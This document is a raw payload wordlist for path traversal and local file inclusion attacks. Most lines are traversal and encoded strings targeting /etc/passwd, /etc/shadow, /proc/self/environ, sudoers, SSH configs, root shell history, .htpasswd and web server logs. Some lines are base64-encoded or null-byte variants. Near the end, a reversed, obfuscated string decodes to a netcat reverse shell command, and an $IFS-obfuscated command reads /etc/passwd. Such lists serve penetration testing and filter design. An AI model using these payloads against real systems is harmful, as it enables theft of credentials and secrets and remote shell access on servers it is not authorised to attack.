../../../../../../../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../etc/passwd%00
../../../../../../../../etc/passwd%00
../../../../../../../etc/passwd%00
../../../../../../etc/passwd%00
../../../../../etc/passwd%00
../../../../etc/passwd%00
../../../etc/passwd%00
../../etc/passwd%00
../etc/passwd%00
..\..\..\..\..\..\..\..\..\..\etc\passwd%00
./../../../../../../../../etc/passwd%00
/etc/passwd%00
\..\..\..\..\..\..\..\..\..\..\etc\passwd%00
/../../../../../../../../../../../etc/passwd%00.html
/../../../../../../../../../../../etc/passwd%00.jpg
../../../../../../etc/passwd&=%3C%3C%3C%3C
/etc/php4.4/fcgi/php.ini
/etc/php4/apache2/php.ini
/etc/php4/apache/php.ini
/etc/php4/cgi/php.ini
/etc/php5/apache2/php.ini
/etc/php5/apache/php.ini
/etc/php5/cgi/php.ini
/etc/php/apache2/php.ini
/etc/php/apache/php.ini
/etc/php/cgi/php.ini
/etc/php.d/dom.ini
/etc/php.d/gd.ini
/etc/php.d/imap.ini
/etc/php.d/json.ini
/etc/php.d/ldap.ini
/etc/php.d/mbstring.ini
/etc/php.d/mysqli.ini
/etc/php.d/mysql.ini
/etc/php.d/odbc.ini
/etc/php.d/pdo.ini
/etc/php.d/pdo_mysql.ini
/etc/php.d/pdo_odbc.ini
/etc/php.d/pdo_pgsql.ini
/etc/php.d/pdo_sqlite.ini
/etc/php.d/pgsql.ini
/etc/php.d/xmlreader.ini
/etc/php.d/xmlwriter.ini
/etc/php.d/xsl.ini
/etc/php.d/zip.ini
/etc/php.ini
/etc/php/php4/php.ini
/etc/php/php.ini
/etc/postfix/mydomains
/etc/proftp.conf
/etc/proftpd/modules.conf
/etc/protpd/proftpd.conf
/etc/pure-ftpd.conf
/etc/pureftpd.passwd
/etc/pureftpd.pdb
/etc/pure-ftpd/pure-ftpd.conf
/etc/pure-ftpd/pure-ftpd.pdb
/etc/pure-ftpd/pureftpd.pdb
/etc/release
./../../../../../../../etc/resolv.conf
./../../../../../../etc/resolv.conf
/etc/resolv.conf
./../../../../../../../../etc/resolv.conf%00
/etc/rpc
/etc/security/environ
/etc/security/failedlogin
/etc/security/group
/etc/security/lastlog
/etc/security/limits
/etc/security/passwd
/etc/security/user
./../../../../../../etc/services
./../../../../../../../../etc/services%00
../../../../../../../../../../../../etc/shadow
..\..\..\..\..\..\..\..\..\..\etc\shadow
./../../../../../../etc/shadow
.\\./.\\./.\\./.\\./.\\./.\\./etc/shadow
/../../../../../../../../../../etc/shadow
/../../../../../../../../../../etc/shadow^^
/..\../..\../..\../..\../..\../..\../etc/shadow
/./././././././././././etc/shadow
/etc/shadow
\..\..\..\..\..\..\..\..\..\..\etc\shadow
../../../../../../../../../../../../../../../../../../../../../../etc/shadow%00
../../../../../../../../../../../../etc/shadow%00
..\..\..\..\..\..\..\..\..\..\etc\shadow%00
./../../../../../../../../etc/shadow%00
\..\..\..\..\..\..\..\..\..\..\etc\shadow%00
etc/shadow%00
./../../../../../../../../etc/ssh/ssh_config%00
/etc/ssh/sshd_config
/etc/sudoers
/etc/syslog.conf
/etc/syslogd.conf
/etc/system
/etc/updatedb.conf
/etc/utmp
/etc/vfstab
/etc/vhcs2/proftpd/proftpd.conf
/etc/vsftpd.chroot_list
/etc/vsftpd.conf
/etc/vsftpd/vsftpd.conf
/etc/wtmp
/etc/wu-ftpd/ftpaccess
/etc/wu-ftpd/ftphosts
/etc/wu-ftpd/ftpusers
file:$(br)/et$(u)c/pas$(te)swd?/
file:${br}/et${u}c/pas${te}swd?/
file:/etc%252Fpasswd/
file:/etc%252Fpasswd%3F/
file:///etc/%3F/../passwd
file:///etc/?/../passwd
file:/etc/passwd?/
file:/etc/passwd%3F/
/.forward
/home2\bin\stable\apache\php.ini
/home/apache/conf/httpd.conf
/home/apache/httpd.conf
/home\bin\stable\apache\php.ini
../.htpasswd
.htpasswd
/.htpasswd
../install.php
install.php
L21hc3Rlci5wYXNzd2Q=
L2V0Yy9tYXN0ZXIucGFzc3dk
L2V0Yy9wYXNzd2Q=
L2V0Yy9wYXNzd2QlMDA=
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3NoYWRvdyUwMA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vZXRjL3Bhc3N3ZA==
Li4vZXRjL3Bhc3N3ZCUwMA==
../../../../../../../../../../../../localstart.asp
../../../../../../../../../../../../localstart.asp%00
/log/miscDir/accesslog
/.logout
../../../../../logs/access.log
../../../../logs/access.log
../../../logs/access.log
../../logs/access.log
../logs/access.log
/logs/access.log
/logs/access_log
../../../../../logs/error.log
../../../../logs/error.log
../../../logs/error.log
../../logs/error.log
../logs/error.log
/logs/error.log
/logs/error_log
/logs/pure-ftpd.log
/master.passwd
member/.htpasswd
members/.htpasswd
/.netrc
/NetServer\bin\stable\apache\php.ini
/opt/apache2/conf/httpd.conf
/opt/apache/conf/httpd.conf
/opt/lampp/logs/access.log
/opt/lampp/logs/access_log
/opt/lampp/logs/error.log
/opt/lampp/logs/error_log
/opt/xampp/etc/php.ini
/opt/xampp/logs/access.log
/opt/xampp/logs/access_log
/opt/xampp/logs/error.log
/opt/xampp/logs/error_log
../.pass
.pass
pass.dat
../.passwd
.passwd
/.passwd
passwd
passwd.dat
/php4\php.ini
/php5\php.ini
/php\php.ini
/PHP\php.ini
/private/etc/httpd/httpd.conf
/private/etc/httpd/httpd.conf.default
/proc/cpuinfo
/proc/interrupts
/proc/loadavg
/proc/meminfo
./../../../../../../proc/mounts
/proc/mounts
/proc/net/arp
/proc/net/dev
/proc/net/route
/proc/net/tcp
/proc/partitions
/proc/self/cmdline
./../../../../../../../proc/self/environ
./../../../../../../proc/self/environ
/proc/self/environ
./../../../../../../../../proc/self/environ%00
/proc/self/status
./../../../../../../../proc/version
/proc/version
/.profile
/ProgramFiles\ApacheGroup\Apache2\conf\httpd.conf
/ProgramFiles\ApacheGroup\Apache\conf\httpd.conf
/ProgramFiles\ApacheGroup\Apache\logs\access.log
/ProgramFiles\ApacheGroup\Apache\logs\error.log
/ProgramFiles\xampp\apache\conf\httpd.conf
/../../../../pswd
/.rhosts
/root/.bash_history
/root/.bash_logut
root/.htpasswd
/root/.ksh_history
/root/.Xauthority
/.sh_history
/.shosts
/.ssh/authorized_keys
user/.htpasswd
../users.db.php
users.db.php
users/.htpasswd
/usr/apache2/conf/httpd.conf
/usr/apache/conf/httpd.conf
../../../../../../../usr/bin/awk
../../../../../../../usr/bin/diff
../../../../../../../usr/bin/find
./../../../../../../usr/bin/r
../../../../../../../usr/bin/sed
../../../../../../../usr/bin/tar
../../../../../../../usr/bin/xargs
/usr/etc/pure-ftpd.conf
/usr/lib/cron/log
/usr/lib/php.ini
/usr/lib/php/php.ini
/usr/lib/security/mkuser.default
/usr/local/apache2/conf/httpd.conf
/usr/local/apache2/httpd.conf
/usr/local/apache2/logs/access.log
/usr/local/apache2/logs/access_log
/usr/local/apache2/logs/error.log
/usr/local/apache2/logs/error_log
/usr/local/apache/conf/httpd.conf
/usr/local/apache/conf/php.ini
/usr/local/apache/httpd.conf
/usr/local/apache/log
/usr/local/apache/logs
../../../../../../../usr/local/apache/logs/access.log
../../../../../../../usr/local/apache/logs/access_log
../../../../../usr/local/apache/logs/access.log
../../../../../usr/local/apache/logs/access_log
/usr/local/apache/logs/access.log
/usr/local/apache/logs/access_log
../../../../../../../usr/local/apache/logs/error.log
../../../../../../../usr/local/apache/logs/error_log
../../../../../usr/local/apache/logs/error.log
../../../../../usr/local/apache/logs/error_log
/usr/local/apache/logs/error.log
/usr/local/apache/logs/error_log
/usr/local/apps/apache2/conf/httpd.conf
/usr/local/apps/apache/conf/httpd.conf
/usr/local/cpanel/logs
/usr/local/cpanel/logs/access_log
/usr/local/cpanel/logs/error_log
/usr/local/cpanel/logs/license_log
/usr/local/cpanel/logs/login_log
/usr/local/cpanel/logs/stats_log
/usr/local/etc/apache2/conf/httpd.conf
/usr/local/etc/apache/conf/httpd.conf
/usr/local/etc/apache/vhosts.conf
/usr/local/etc/httpd/conf/httpd.conf
/usr/local/etc/httpd/logs/access_log
/usr/local/etc/httpd/logs/error_log
/usr/local/etc/php.ini
/usr/local/etc/pure-ftpd.conf
/usr/local/etc/pureftpd.pdb
/usr/local/httpd/conf/httpd.conf
/usr/local/lib/php.ini
/usr/local/php4/httpd.conf
/usr/local/php4/httpd.conf.php
/usr/local/php4/lib/php.ini
/usr/local/php5/httpd.conf
/usr/local/php5/httpd.conf.php
/usr/local/php5/lib/php.ini
/usr/local/php/httpd.conf
/usr/local/php/httpd.conf.php
/usr/local/php/lib/php.ini
/usr/local/pureftpd/etc/pure-ftpd.conf
/usr/local/pureftpd/etc/pureftpd.pdb
/usr/local/pureftpd/sbin/pure-config.pl
/usr/local/www/logs/thttpd_log
/usr/local/Zend/etc/php.ini
/usr/pkgsrc/net/pureftpd/
/usr/ports/contrib/pure-ftpd/
/usr/ports/ftp/pure-ftpd/
/usr/ports/net/pure-ftpd/
/usr/sbin/pure-config.pl
/usr/spool/lp/log
/usr/spool/mqueue/syslog
/var/adm
/var/adm/acct/sum/loginlog
/var/adm/aculog
/var/adm/aculogs
/var/adm/crash/unix
/var/adm/crash/vmcore
/var/adm/cron/log
/var/adm/dtmp
/var/adm/lastlog
/var/adm/lastlog/username
/var/adm/log/asppp.log
/var/adm/loginlog
/var/adm/log/xferlog
/var/adm/lp/lpd-errs
/var/adm/messages
/var/adm/pacct
/var/adm/qacct
/var/adm/ras/bootlog
/var/adm/ras/errlog
/var/adm/sulog
/var/adm/SYSLOG
/var/adm/utmp
/var/adm/utmpx
/var/adm/vold.log
/var/adm/wtmp
/var/adm/wtmpx
/var/adm/X0msgs
/var/apache/log
/var/apache/logs
/var/apache/logs/access_log
/var/apache/logs/error_log
/var/cpanel/cpanel.config
/var/cron/log
/var/lib/mlocate/mlocate.db
/var/lib/mysql/my.cnf
/var/local/www/conf/php.ini
/var/lock/samba
/var/log
../../../../../../../var/log/access.log
../../../../../../../var/log/access_log
../../../../../var/log/access_log
/var/log/access.log
/var/log/access_log
/var/log/acct
../../../../../../../var/log/apache2/access.log
../../../../../../../var/log/apache2/access_log
/var/log/apache2/access.log
/var/log/apache2/access_log
../../../../../../../var/log/apache2/error.log
../../../../../../../var/log/apache2/error_log
/var/log/apache2/error.log
/var/log/apache2/error_log
../../../../../../../var/log/apache/access.log
../../../../../../../var/log/apache/access_log
../../../../../var/log/apache/access.log
../../../../../var/log/apache/access_log
/var/log/apache/access.log
/var/log/apache/access_log
../../../../../../../var/log/apache/error.log
../../../../../../../var/log/apache/error_log
../../../../../var/log/apache/error.log
../../../../../var/log/apache/error_log
/var/log/apache/error.log
/var/log/apache/error_log
/var/log/apache-ssl/access.log
/var/log/apache-ssl/error.log
/var/log/auth
/var/log/auth.log
/var/log/authlog
/var/log/boot.log
/var/log/cron.log
/var/log/dmesg
../../../../../../../var/log/error.log
../../../../../../../var/log/error_log
../../../../../var/log/error_log
/var/log/error.log
/var/log/error_log
/var/log/exim/mainlog
/var/log/exim_mainlog
/var/log/exim/paniclog
/var/log/exim_paniclog
/var/log/exim/rejectlog
/var/log/exim_rejectlog
/var/log/ftplog
/var/log/ftp-proxy
/var/log/ftp-proxy/ftp-proxy.log
/var/log/httpd/
../../../../../var/log/httpd/access_log
/var/log/httpd/access.log
/var/log/httpd/access_log
../../../../../var/log/httpd/error_log
/var/log/httpd/error.log
/var/log/httpd/error_log
/var/log/httpsd/ssl.access_log
/var/log/httpsd/ssl_log
/var/log/kern.log
/var/log/lastlog
/var/log/lighttpd
/var/log/maillog
/var/log/message
/var/log/messages
/var/log/mysqlderror.log
/var/log/mysqld.log
/var/log/mysql.log
/var/log/mysql/mysql-bin.log
/var/log/mysql/mysql.log
/var/log/mysql/mysql-slow.log
/var/log/ncftpd.errs
/var/log/ncftpd/misclog.txt
/var/log/news
/var/log/news.all
/var/log/news/news
/var/log/news/news.all
/var/log/news/news.crit
/var/log/news/news.err
/var/log/news/news.notice
/var/log/news/suck.err
/var/log/news/suck.notice
/var/log/poplog
/var/log/POPlog
/var/log/proftpd
/var/log/proftpd.access_log
/var/log/proftpd.xferlog
/var/log/proftpd/xferlog.legacy
/var/log/pureftpd.log
/var/log/pure-ftpd/pure-ftpd.log
/var/log/qmail
/var/log/qmail/
/var/log/samba
/var/log/samba-log.%m
/var/log/secure
/var/log/smtpd
/var/log/spooler
/var/log/syslog
/var/log/telnetd
/var/log/thttpd_log
/var/log/utmp
/var/log/vsftpd.log
/var/log/wtmp
/var/log/xferlog
/var/log/yum.log
/var/lp/logs/lpNet
/var/lp/logs/lpsched
/var/lp/logs/requests
/var/mysql.log
/var/run/httpd.pid
/var/run/mysqld/mysqld.pid
/var/run/utmp
/var/saf/_log
/var/saf/port/log
/var/spool/errors
/var/spool/locks
/var/spool/logs
/var/spool/tmp
/var/www/conf/httpd.conf
/var/www/html/.htaccess
/var/www/localhost/htdocs/.htaccess
/var/www/log/access_log
/var/www/log/error_log
../../../../../../../var/www/logs/access.log
../../../../../../../var/www/logs/access_log
../../../../../var/www/logs/access.log
/../../var/www/logs/access_log
/var/www/logs/access.log
/var/www/logs/access_log
../../../../../../../var/www/logs/error.log
../../../../../../../var/www/logs/error_log
../../../../../var/www/logs/error.log
../../../../../var/www/logs/error_log
/var/www/logs/error.log
/var/www/logs/error_log
/var/www/sitename/htdocs/
/var/www/vhosts/sitename/httpdocs/.htaccess
/var/www/web1/html/.htaccess
/Volumes/Macintosh_HD1/opt/apache2/conf/httpd.conf
/Volumes/Macintosh_HD1/opt/apache/conf/httpd.conf
/Volumes/Macintosh_HD1/opt/httpd/conf/httpd.conf
/Volumes/Macintosh_HD1/usr/local/php4/httpd.conf.php
/Volumes/Macintosh_HD1/usr/local/php5/httpd.conf.php
/Volumes/Macintosh_HD1/usr/local/php/httpd.conf.php
/Volumes/Macintosh_HD1/usr/local/php/lib/php.ini
/Volumes/webBackup/opt/apache2/conf/httpd.conf
/Volumes/webBackup/private/etc/httpd/httpd.conf
/Volumes/webBackup/private/etc/httpd/httpd.conf.default
/web/conf/php.ini
/WINDOWS\php.ini
../../../../../../../../windows/win.ini
../../windows/win.ini
..\..\..\..\..\..\..\..\windows\win.ini
/WINNT\php.ini
/..\..\..\..\..\..\winnt\win.ini
/www/logs/proftpd.system.log
/xampp\apache\bin\php.ini
/.Xauthority
ZXRjL3Bhc3N3ZA==
ZXRjL3NoYWRvdyUwMA==
/v1/docs//..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\/etc/passwd /../../../../../../../../etc/random/../password 
/file.ext%00.php
/asset////////////////../../../../../../../etc/passwd
\?.*=(\/\/?\w+|\w+\/|\w+(%3A|:)(\/|%2F)|%2F|[\.\w]+\.\w{2,4}[^\w])
%C0AE%C0AE%C0AF%C0AE%C0AE%C0AFetc%C0AFpasswd
$(printf 'hsab/nib/ e- 4321 1.0.0.721 cn'|rev)
file:///etc/./passwd
/foo/../etc/bar/../passwd
../et*/pas**d
cat$IFS$9${PWD%%[a-z]}ec${PWD%%[a-z]*}p?ss??
